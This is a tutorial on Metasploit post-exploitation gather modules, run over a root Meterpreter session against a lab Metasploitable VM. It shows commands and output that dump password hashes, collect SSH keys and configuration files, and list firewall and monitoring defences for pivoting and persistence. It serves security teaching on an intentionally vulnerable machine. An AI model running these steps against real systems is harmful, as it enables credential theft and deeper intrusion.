How To: Quickly Gather Target Information with Metasploit Post Modules

Post-exploitation information gathering can be a long and drawn-out process, but it is an essential step when trying to pivot or establish advanced persistence. Every hacker should know how to enumerate a target manually, but sometimes it is worth it to automate the process. Metasploit contains post modules that can quickly gather valuable information about a target, saving both time and effort.

In the previous tutorial, we used Metasploit's local exploit suggester to get root on the target. To use post modules, we need to have a Meterpreter session running. These modules will run as any user to some extent, but having root-level access is ideal as it allows us unrestricted access to the system.

• Previously: Get Root with Metasploit's Local Exploit Suggester

What Information Is Most Valuable to an Attacker?

It has been said time and time again that reconnaissance is one of the most critical phases of an attack. It applies to not only the initial preparation for an attack, but also the post-exploitation stage. Successful mining of information after a target is compromised can lead to longer persistence and exploitation of additional machines.

Some of the most valuable information to an attacker includes things like password hashes, credentials, and any other sensitive data that could be abused. Other items of interest are network configurations, system configurations, and config files of standard software likely to be found on the system. Checking what defenses are in place, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

To get started, from the main prompt in Metasploit, use the sessions command to display the current sessions running in the background:

msf5 > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50)

Session 3 is ideal here since it is running as root; this is the Meterpreter session we obtained in the previous tutorial, but any root session will suffice.

To see the available post modules, we can start by typing the full path and quickly pressing Tab twice to see the autocomplete options:

msf5 > use post/linux/gather/

use post/linux/gather/checkcontainer         use post/linux/gather/enum_network           use post/linux/gather/enum_xchat             use post/linux/gather/openvpn_credentials
use post/linux/gather/checkvm                use post/linux/gather/enum_protections       use post/linux/gather/gnome_commander_creds  use post/linux/gather/phpmyadmin_credsteal
use post/linux/gather/ecryptfs_creds         use post/linux/gather/enum_psk               use post/linux/gather/gnome_keyring_dump     use post/linux/gather/pptpd_chap_secrets
use post/linux/gather/enum_commands          use post/linux/gather/enum_system            use post/linux/gather/hashdump               use post/linux/gather/tor_hiddenservices
use post/linux/gather/enum_configs           use post/linux/gather/enum_users_history     use post/linux/gather/mount_cifs_creds

The first one we will try out is the hashdump module; this will dump the password hashes for all users on the system, which can then be attempted to crack. Even though we already have root on this machine, other credentials can often be used to pivot around the network.

Load the module with the use command:

msf5 > use post/linux/gather/hashdump

We can then look at the options for this post module:

msf5 post(linux/gather/hashdump) > options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

The only thing we need to set is the session to run this on. To do so, use the set command and the appropriate session number:

msf5 post(linux/gather/hashdump) > set session 3

session => 3

Then, simply type run to launch it:

msf5 post(linux/gather/hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed

We can see the hashes for all users on the system now, and it even writes this information to a file for us.

Module 2: Checkvm

The next module we will try is the checkvm module; this will attempt to determine whether the target is a virtual machine or not, which can be useful information for specific exploits or attack vectors.

Load the module:

msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm

And take a look at the options:

msf5 post(linux/gather/checkvm) > options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Again, we only need to set a session number for this module to work. Since our session number won't change going forward, we can use the setg command to set the option globally. That way, we won't have to keep typing in the same thing over and over again.

msf5 post(linux/gather/checkvm) > setg session 3

session => 3

Type run to kick it off:

msf5 post(linux/gather/checkvm) > run

[*] Gathering System info ....
[+] This appears to be a 'VirtualBox' virtual machine
[*] Post module execution completed

We can see that it determines the target appears to be a VirtualBox virtual machine.

Module 3: enum_protections

The next one we will try out is the enum_protections module; this tries to find certain programs on the target that can be used to detect an attack, like antivirus, firewalls, IDS/IPS, network sniffing software, and others.

Load the module:

msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections

Since we globally set the session option earlier, it is already set for us when we look at the options:

msf5 post(linux/gather/enum_protections) > options

Module options (post/linux/gather/enum_protections):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.

All we have to do now is run the module:

msf5 post(linux/gather/enum_protections) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[*]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Finding system protections...
[+] ASLR is enabled
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] iptables found: /sbin/iptables
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[+] aa-status found: /usr/sbin/aa-status
[*] Post module execution completed

We can see it gives us a banner this time, although it is a little disjointed, and information about any system protections in place. It looks like it found some firewall software, tcpdump, and ASLR is enabled; this kind of information can be very valuable when preparing an attack.

Module 4: enum_configs

The next module we will try is the enum_configs module; this will attempt to find any configuration files for commonly installed software. While this information could be found manually, the module makes it easy to quickly gather everything up all at once.

Load the module:

msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs

And run it:

msf5 post(linux/gather/enum_configs) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[*]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Failed to open file: /etc/security/sepermit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ca-certificates.conf: core_channel_open: Operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed

We can see it found all kinds of things, like an Apache config, sysctl, smb, and others. It also stores each of these files it finds in a directory for later use. For instance, we can view the Apache config by catting out the full path of the file:

msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

...

Module 5: enum_network

The next module we'll run is the enum_network module; this will gather any network-related information on the target, such as IP addresses, routes, open ports, SSH configs, and DNS information.

Load the module:

msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network

And run it:

msf5 post(linux/gather/enum_network) > run

[*] Running module against metasploitable.localdomain
[*] Module running as root
[+] Info:
[+]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Collecting data...
[+] Network config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up/If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed

We can see it collected a plethora of network information, all of which could be useful for an attacker. For example, we can view the network config file:

msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0      Link encap:Ethernet  HWaddr 08:00:27:77:62:6c
          inet addr:10.10.0.50  Bcast:10.10.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe77:626c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2643 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2268520 (2.1 MB)  TX bytes:361635 (353.1 KB)
          Base address:0xd010 Memory:f0000000-f0020000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:325 errors:0 dropped:0 overruns:0 frame:0
          TX packets:325 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:125465 (122.5 KB)  TX bytes:125465 (122.5 KB)

Module 6: enum_system

The last module we will cover today is the enum_system module; this will collect system information about the target, including Linux version, installed packages, running services, cron jobs, and user accounts. Again, these are all things that could be found manually, but sometimes it makes more sense to have it done for you all at once.

Load the module:

msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system

And run it:

msf5 post(linux/gather/enum_system) > run

[+] Info:
[+]                     _                  _       _ _        _     _      ____   _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                            |_|                                          Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started
[+]     Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+]     Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed Packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Running Services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron jobs stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk info stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Logfiles stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post module execution completed

We can see it discovered valuable system information. For instance, we can view all the user accounts on the system:

msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
dhcp
syslog
klog
sshd
msfadmin
bind
postfix
ftp
postgres
mysql
tomcat55
distccd
user
service
telnetd
proftpd
statd

Wrapping Up

Today, we explored some of Metasploit's post modules to gather valuable information about the target. We covered modules to check for what protections are in place and whether the system is a VM or not, modules to discover configuration information pertaining to the network and common software, and even a module to dump password hashes. While all of this information can be gathered manually, Metasploit makes the job quick and painless.